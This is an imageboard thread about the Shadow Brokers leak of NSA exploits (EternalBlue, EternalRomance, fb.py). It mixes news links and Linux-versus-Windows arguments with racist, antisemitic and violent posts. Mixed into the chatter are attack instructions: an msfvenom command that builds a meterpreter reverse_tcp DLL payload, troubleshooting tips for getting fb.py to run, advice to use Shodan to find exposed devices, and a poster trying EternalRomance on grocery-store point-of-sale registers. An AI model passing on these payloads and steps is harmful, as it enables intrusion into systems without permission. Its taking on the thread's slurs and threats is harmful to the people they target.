
The world is our oyster, brothers

Who could have done this?

EQGRP Lost in Translation

THIS! THIS! THIS! FREE TAY ASAP!

Is fb.py the main framework or do we just fire every script.py and see what happens?
Maybe you find a better suited tutorial.flv, some just talk to much, some have just nice music and no talking at all while the hacking progresses.

I hate to burst your potential awesome hacking bubble here, but Evil Microsoft has been on top of this for a nice, long while!!!

Mysterious Microsoft patch killed 0days released by NSA-leaking Shadow Brokers

arstechnica.com/security/2017/04/purported-shadow-brokers-0days-were-in-fact-killed-by-mysterious-patch/?utm_source=dlvr.it&utm_medium=twitter
MORE LEAKED NSA HACKING TOOLS!!!

EQGRP Lost in Translation Download

There is an Arch and a Manjaro with OpenRC only.
I'd recommend getting Trisquel for the plebs though, its fully libre.

It is still full of holes dipshit.

Pure coincidence.

so do these tools work or no?

Yes if the target computer is a month behind in updates.

Unless you have a Windows 10 "UPDATE ME OR I SWEAR I'LL KILL US ALL" machine the exploits work fine.

looooooool

And thanks to the US Alphabetniggers, the world just became extremely dangerous. THANKS GUYS!!!!!!!!!!!!!!!

This is still the Motherlode, full of exploits and 0day goodstuff!!! STILL VERY DANGEROUS!!!

Malware To Shut Down Computers Worldwide?
youtube.com/watch?v=Y5f8NoQnJS4

“Unix has retarded OS research by 10 years and linux has retarded it by 20.”

- Dennis Ritchie

shadow GAYKERS haha POOPIE POOP POOPPIEWEEE AHHH TAKE MY GRUMPY DUMPIES AHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH HASHAHA POOPPEOEPI PAOEOPAPSAOPP POOPIE DOODODIE DOODOO HAHAIHGBADFSGHAKDRGHJNAEK DFGHASJDFKLG

Hey Holla Forums

I'm so dumb that I never understood what this meant.>>9718627

shills be like " dosnt hurt to try"

Or so the germans would have us believe.

Anyone who thinks the 0days got patched is a fucking idiot.

If they really want to take down the internet and have massive bank "bail-ins" they won't be using hacking tools, they'll have a nuke delivered into the upper atmosphere which will create an EMP that would fry the electric grid within America. Boom! All in one swift swoop.

I don't think (((they))) are quite ready for that….. yet.

I've just finished combing through the information in the latest leaks and it seems like it is nothing substantial sadly.
I'm gonna go to sleep and I suggest the rest of you do too. It's late we should rest our eyes and take a quick nap.

Are dracos a nigger gun or something?

Oh, you shills again.
Fuck anyone who uses this tactic. It's shilling 101.

Not really, but they appeal to niggers and gopniks because of their small size so they can do quick drive-bys.

This is fucking nuts, are we sure this isn't a honeypot?

Yeah but how? I'm an autist when it comes to tech is there a guide somewhere?

How do I run a .gpg file?

after they successfully convinced part of Holla Forums that the new A. Wyatt Mann pics were honeypots/backdoored I'm not sure we can ever be sure what "we" are sure of.

kys, mod

Still nothing hacked?

FREE TAY

msfvenom -f dll -a x64 -p windows/meterpreter/reverse_tcp LHOST=your_ip RPORT=opened_port > REEEEE.dll

Correction, LPORT, not RPORT.

gpg –decrypt –output outputfile.zip inputfile.gpg

you need to install gpg first:
superuser.com/questions/435252/small-sized-gpg-command-line-tool-for-windows

Holla Forums isnt even talking about this. Why the silence? Is a mod trolling pol by sticking this or is this something, if yes, why no happening?

fuck you kike fed

>>>/poltech/66
stick with 17.3 tbh

What specific updates do I install to protect myself from this?

Ya even cuckchan /g/ isn't talking about it. The fuck is going on?

I try to skill my guide whenever the subject of linux comes up >>>/poltech/66
truth be told it needs updating though

Holla Forums doesnt seem to be very active here, or at least not interested in windows hacking publicly

most of this this zerodays were patched few months ago, seems that TheShadowBrokers was /goodguy/ and gave hacks to microsoft in advance. Something NSA didnt do for years

here are some links

emptywheel.net/2017/04/14/the-shadow-brokers-vulnerability-equities-process-nsa-has-had-at-least-96-days-to-warn-microsoft-about-these-files/
emptywheel.net/2017/04/14/nsa-continued-double-dipping-at-swift-even-after-it-was-exposed/
bleepingcomputer.com/news/security/shadow-brokers-release-new-files-revealing-windows-exploits-swift-attacks/
motherboard.vice.com/en_us/article/leaked-nsa-hacking-tools-were-worth-2-million
theintercept.com/2017/04/14/leaked-nsa-malware-threatens-windows-users-around-the-world/
arstechnica.com/security/2017/04/nsa-leaking-shadow-brokers-just-dumped-its-most-damaging-release-yet/
motherboard.vice.com/en_us/article/the-latest-shadow-brokers-dump-of-alleged-nsa-tools-is-awful-news-for-the-internet
motherboard.vice.com/en_us/article/shadow-brokers-dump-alleged-windows-exploits-and-nsa-presentations-on-targeting-banks

DO THIS NOW!

Supplemented with scintillating commentary.

Then, why the fuck is this sticked?

what anime?

So this is all a bust then. OK.

Lame.

I want the end of the market nOW

Thanks, I just got a VPN running Windows, am I more safe?

Wasn't Hillary going to drop the TPP to try and grab the Bernie camp?

Oh wait that would go against your narrative that Trump isn't actually a globalist, and that he's actually playing 12th dimensional chess trying to string the Jews along even though he has as much power as he ever will.

She *said* she was going to drop the TPP after it became clear that the womyn card wouldn't sway all of the berniebots.

You are never safe under Windows. You can prevent Eternalblue by firewalling every port SMB uses, though.

Would she rather harm her chance at reelection and bolster Bernie's chance next election by not dropping the TPP, or would she drop the TPP then engage in other, similar agreements in the future? Maybe the TPP didn't go down exactly how the globalists wanted it to, and they didn't want the US to ultimately see it through?

Ghost in the Shell: Standalone Complex, I think.

It's up to you to kill your fellow jew

Even out of context.

If you want a good metaphor then listen to the first album of Gloryhammer. It looks like we've got the Hammer of Glory for ourselves, now we need a magic dragon and the Amulet of Justice.

In other words, I am going to do it
I am who I am
I am what I am
I will be who I am
What I am I will be

Not going to be
Not was

I am what I am
I am who I am
I will be what I will be

You are who you are and who you are
Who you are
Who does he think he is?

Sorry to pee on your parade. Actual expert here (writing on OpenBSD+Tor both of which you should use, too!) if you don't value your time

All these "zero days" were already fixed in March. What is interesting is the response from Microsoft: they always have a little explanation for each patch. Not this time. It's completely clear NSA tipped them off although they're denying it. You should really think twice continuing to use Windows (or Mac for that matter). They are both in bed with (((TLA's))). As suggested above, Mint without systemd is a good n00b choice.

arstechnica.com/security/2017/04/purported-shadow-brokers-0days-were-in-fact-killed-by-mysterious-patch/

Go fuck yourself. I've been using OpenBSD since the late 90s, and it is still dog shit. If you're fine with a lack of multi-threading and an upgrading path that is about as fun as pulling out fingernails, then by all means, use OpenBSD. If you actually have to maintain these machines longer than their release schedule, then don't use OpenBSD. Every six months you have a new set of hoops to jump through and 30 minutes of down time. What a great thing to look forward to. OH, and even if you're following -CURRENT you still can't change versions without the same goofy upgrade routine. For all of the glory OBSD gets they still haven't figured out binary upgrades, something FreeBSD did a long time ago. Get the fuck out of here with your wannabe nerd street cred.

Its not clear who tipped them of.
Could be ShadowBrokers himself, or NSA. But if it was NSA they could do it in September when they figured out that ShadowBrokers has their shit.

twitter.com/josephfcox/status/852983848862461953
mozilla.org/en-US/security/advisories/mfsa2016-47/

seems like an intentional contained leak

im not particularly knowledgeable when it comes to computers, but it looks to me like microdick updated their security database to include this shit sometime recently

Nope, it's just that every smart person is trying to use circumstances at hand for their own goal.

Many international companies work on rules of countries they reside in (ie they help local,regional,national spy agencies) for a rub back. Companies get valuable data and closeness with governments while governments get power.

I would guess Microsoft has been outplayed at this moment. NSA didnt ask Micro-soft (dick) for permission on exploits, nor did they ask for any holes to be left open.
I would say that Microsoft is trying to create something of value from ashes like this negative PR.

Some in march 2017
Some earlier.

Damage control, methinks.

IT'S UNDERSTANDABLY YOU FUCKING RETARDS. WHAT FUCKING POOINLOO WROTE THIS??

Yeah, installing Linux right now.

So, we Right Wing Tech Squads now?

How long until we can muscle off Cultural Marxism from the internet?

The funniest part about these threads is always this magical thinking that *nix is somehow safe. Do you really believe that the various groups (Linux kernel devs, yourdistrohere devs) haven't been infiltrated? Really? Let me guess, plenty of you are here via a cheap shit off the shelf "router", but you're going to be totally secure by switching to Linux and spending weeks figuring out how to do anything. Right. Ffs, even hardware today is compromised.

———–/´¯/' .'/´¯`•_
———-/'/–/—-/—–/¨¯\
——–('(———- ¯~/'–')
———\ —-HACK —/
———-'\'—-THE —•´
————\ PLANET (
————-\—

WHY AREN'T YOU NIGGERS DOING THIS

4 U

Why are there so many E names?

gee I wonder who could be behind this post
Proper *nixes are always safer than wangblows. Paranoid? Build from source. Even more paranoid? Flash coreboot. Still paranoid? Get a LibreCMC-compatible router or simply leech off your neighbor's WiFi.

no suprise here but why is this thread sticked than? Nothing is going to happened!

alphabeticly sorted.

checked
We have many amulets already though, just take your pick!
(just don't get a sunwheel, shit will get caught on everything)

Hi heeb. Yeah, some of us have been keeping a close eye on Netanyahu since the Oct 2015 UN conference.
Seems like you nats are in a pretty complicated arrangement there.
http:// www.jpost.com/Opinion/Our-World-Soross-campaign-of-global-chaos-464770
you stay on your side of the wall, we'll stay on ours, it be aight then.

I facepalmed so fucking hard when I saw that post. I still can't believe they did that.

Bob Saget could definitely be considered the Ur-cuck.

A 20 year software dev with plenty of time on both platforms, that's who. Compile from source? Oh, so you can read it? And know what to look for? You don't?

I notice you didn't address the fact that EVERYTHING is compromised, because that goes against the Stallman autism.

The only code you can trust is written by the man in the mirror.

the nsa created the tools i'm sure they told microsoft what exploits they had once they realized they were leaked into the wild

They were all combinations of lies, jokes, trolling, sarcasm, and foolishness.

At no point did I mean anything posted seriously.

Fuck the old NWO, we're the real NWO now.

I hereby avow all past posts linked to this guy's private identity. He might not have meant what he said, but he said what I meant, and everything about it was 100% serious.

I'm a 40yr software dev, suck a dick if you need a windows host for anything that can be done in a VM.

I'm a 30yr software dev, suck a dick if you need a windows host for anything that can be done in a VM.

qz.com/960501/microsoft-msft-mysteriously-managed-to-fix-nsa-targeted-security-gaps-revealed-in-shadow-brokers-leak/

Microsoft says they've fixed them. So either the NSA squealed or Shadowbrokers decided to make some money…

Nice Engrish, poojeet.

Does anyone know what format of shell code Eternalromance expects?

I work at a grocery store and virtually every POS register and backend is vulnerable to Eternalromance, can't for the life of me figure out what sort of input the shell code needs to be for the exploit to work.

i've tried C, Py, raw, pl and dll, everything just causes a bsod on execution.

I'm getting mighty tired of continuously rebooting registers in the store.

still works

Well it doesnt look like this is the case
NSA knows since august 2017 that shadowbrokers pawned them
or at least since Jan 2017

Fact that last few exploits were patched in March 2017 more points to theory that ShadoeBrokers leaked them to Micro$soft when they decide they will release what they released so far.

Funny, It appears that this might have been before Trump started to piss of Holla Forums

Yearly reminder, the only reason microsoft will even give a remote shit about this is because it is now public and can hurt their image. If you are using windows you are willingly subjecting yourself to these exploits and the many others as well as deliberate backdoors and other means of exploitation from microshaft. Your computer is not your own running that software.

Message courtesy of your friendly mouthbreathing Holla Forums shitposter

*nix users are usually poorfags, cheapfags, or don't-actually-do-anything-seriousfags.

Since you got dubs…
Aldnoah.Zero, Ep 1: When Martians Attack

it's so that you know that the code is actually the code everyone is looking over.

The idea is that if there is some backdoor, then someone will stumble across it in the source and make it known to everyone, so if you compile from source it's less likely that you'll have an intentional backdoor than if you download it blindly.

especially out of context, goy

Not that uncommon,
I am security expert myself, with 30 years of experience.
I've just finished combing through the information in the latest ShadowBrokers leaks and it seems like it is nothing substantial sadly.
What a waste of time. I'm gonna go to sleep and I suggest the rest of you do too. It's late we should rest our eyes and take a quick nap.

Sage for off-topic.
How does one even know what he is doing with that kind of battle station? Four different mice, and the CB radios(?). Damn, I would be doing okay at 2 screens, not 4 and only 1 mouse.

Its couple of years old picture of some HAM nerds mancave, that doesnt rely solely on WebRTC.

No wonder they are irrelevant.

Most of it is probably focused on a specific purpose ie. listening to cop radios and recording them.

I take it that you have never even opened a video editor.

Anyone?

fucking faggot

Those guys mostly focus on listening to long wave signals that travel around the world (reflecting from ionosphere)

They are intercepting sattelites signals, millitray radios, number stations, even some spy stuff and lots of chatting.

priyom.org/
dailymail.co.uk/sciencetech/article-2877988/Can-solve-mystery-UVB-76-Radio-station-buzzed-second-1970s-no-one-knows-why.html

Its fun hobby, you can try it with online WebRTC radios: webrtc.org/

Any of this shit have confirmed backdoors or malware? It still seems too good to be true.

Get a separate laptop/toaster for shitposting and do your work/play/dank oc creation offline.

It's not as nub friendly, (no EFI installer for instance, iirc) but Devuan, which is just Debian with OpenRC, is probably better than using an old version of a distro.

sorry i am retarded

webSDR*
websdr.org/

webRTC is some browser protocol that is better to disable, because it can be exploited to reveal your IP even if you are behind proxy or VPN

Seriously. You need to be spinning up a sandbox to play with this anyway, spin up an arch vm.

why are we afraid of them again

All exploits are fucking .EXEs. It won't fly without Windows. I had to throw together a VM.

Just be careful, use a VM and you should be fine.

To all of those smart enough to learn how to use these exploits, as many have already said in this thread there are so much possibilities that can come from this. Check out a website called SHODAN. Shodan is a search engine for devices connected to the internet, that is everything from themostats to nuclear reactor pressure gauges. Good luck!

wouldn't touch it with a ten foot pole don't give a rats about winblows boxes no wizard yet don't give a fuck was plenty ways ass blast indows and still are not into that kinda shit unless its exposing liars on gov intel other that that pfft say its good show what you do expose ppl stop playing other wise hackers can to it before your win xp shit

Yea. I have always run into python issues stemming from those.

some on inside some just know shit like that and would fuck you up anyway if they wanted to .seems to me we got some fuckers risk their life like Seth got axed because he tried.come on ppl stop letting jews run you

its off topic as is this whole post lol Seth Rich whacked and your ten yer ago backdoor don't cover that fact you fucking punks

There was user in here earlier that outlined a lot of this is has been patched already.

you killing ppl in secret how about we just start killing you in broad daylight you subversive rats

are these programs trying reach to an external repo for stuff?

If so, thats not good.

imagine all the haxxo been usinng this the whole time and at this point only idiots

use winblows*

So I've read some reports that these exploits have already been fixed. Is this true?

I'm positive I'm setting this all up correctly but so far it backdoors my own machine every time lol. Definitely not using my own machine as target IP but none the less

Maybe for windows 10 but a lot of these older windows servers barely get updated anyways

g head tho I crank up the dirtbike and win machine is getting axed while I ride hair scrambles you bitch

we make bon fires yuge don't give a shit about internet only how high we can get the fire and yea budweiser is two sips what a jip

march

stake up palates 40 feet high little gas BLAZE!!!!! so high the helo had to go off course instead of getting burnt LOL we all in r/vs lol or come to Alaska my second home and try us lol

The fuck are you even doing

you stupid smart phone btfo nature rules think you so smart LOL TRY TO SURVIVE you little bitches

you wont be crying about a fascist then I assure you that from exp you fucking punks Live or die very simple no jew bs in between cut and dried either live or die.

Alaska!! the last great land you faggot

12 posts. Brilliant shilling, thread's almost out of replies now.

must suck to not be close to freedom so you bitch about posts what you a uk snownigger lol

Alaska rocks your silly ass off the top frame LAD

shill ? nah don't advise any antifa going their it will kill you str8 up you aint ready even in summertime you fuck off you will get wrecked like dead stay in cali and think you know survival lol

alot of you come up ever year end up bear bait or froze to death fucking pussies come on up

yesterdays news paper this entire post gl with that could hack em without it I am sure

What are you asking exactly?

I been to the edge jumped off a perfectly good cliff Come fly with me faggot.open your mind set you free tsk\ \\tsk// Only us are able to appreciate it you low ground faggot

so many reasons our boys kick asswe do what none can do and really hurt feelings you punk spectator

are you fucking stupid having navy S.E.A.L.s drop on your ass ahahaha wow you done fucked up boy mother fucker if they come you just got hurt

we can take this else where you yapping about so bullshit backdoors as if any of us needed help hacking a winblow box

plenty 0 days the day you trip that fagg bullshit fuck micro soft

fuck off CIA

leave CIA ./ no want your pozzed shit now fuck off

So until someone capable of reading and understanding notices, the code may contain bad shit (OpenSSL, proven to have alphabets undercover as neckbeards, says hi!). Then it has to be documented, brought to the attention of the maintainers either with an explanation or a submitted patch, then redistributed to all affected. In the meantime, who knows what damage has been done? (OpenSSL says hi again!)

How is this any fucking different? The point I've repeatedly made, that keeps getting ignored is that no, Linux is not a magical solution to keep you safe. Do any of you REALLY think they don't attack it, with all the servers running it?

When zealots spew "*nix is moar secure!" they almost always leave out details. Comparing a desktop with a much larger attack surface (more net connected things) to a stripped down server with only one or two connections is common.

Run whatever the hell you want, but lock it down and practice good opsec. Pushing the bullshit idea that something is just magically more secure when fucking everything is compromised, including hardware now, is unhelpful to non-tech fags at best and harmful (spook the herd much, NSA?) at worst.

Microsoft has been putting backdoor into their Windows operating systems for at least 20 years

Also, daily reminder that Gates is a crypto-kike, his dad is a billionaire and he's been a fixture at globalist meetings from the very beginning. Take you vaccines Goyim, there are too many of you

EZPZ.

Why doesn't somebody write a worm that automatically infects other machines and then deletes system32? We could destroy the world with this in a few hours. A shame that I'm such a lasy fag.

archive.fo/5DCg3

After successful exploitation with Eternalromance the script asks for a file containing shellcode that will be executed.

My question is, what format does the shellcode in the file need to be?

I generated plenty of shellcode with MSFVenom but none of it works and BSOD's the target computer every time.

MSFVenom can output shellcode in the following types

What type will function with the exploit?

the laughing kek

I went through your post and it seems like it is nothing substantial sadly.

well done, big guy

What's funny here that it is the exact phrasing they used in earlier threads.
down to ending with "sadly"

Cool. Me too.

Don't forget AIPAC

Sooner or later the real software will come up.

I mean, just think about it, its a new form of terrorism.

For fucks sake Holla Forums
half the thread is shills, half is "hao do I loonix/terminal/metasploit/bangblows" with some Holla Forums people thrown in here and there
it would be hilarious if /baph/ offered classes

That's how you know we're on to something big and that we've hit a gold(((berg))) vein.

The sun shall rise on our time soon enough, user.

this, shodan is pretty neat. I've used it before to fuck with college campus printers

null-byte.wonderhowto.com/how-to/shodan/

Thanks based Chinamen collaborator I almost have this shit working now. Only problem is related pic. Can anyone tell me why the fuck it's hanging up still? Before it wouldn't even run, and now it get's further with this user's help, but it still hangs up. Another user on halfchan is having this same problem in /g/

My soul is tired of faggots who think shill LARPing is kewl, their repetitive, retarded memes, their endless fascination with getting cheap (you)'s from newfriends and slightly lesser tier morons than themselves. No one is so obvious, random, or nonsensical in their shilling IRL.

Every thing you could possibly need to know about opsec (or any tech, generally) is out there, you just have to be willing and patient to learn and know where to look

also having this issue
also bump

comment out lines 26, 27, 28, 74, 75
from fb.py

Thanks a ton for the help, but commenting out those lines only opened me up to new errors and shit. Working a diff angle..

it works for me after commenting them out, the problem is there are some folders missing like /listeningpost/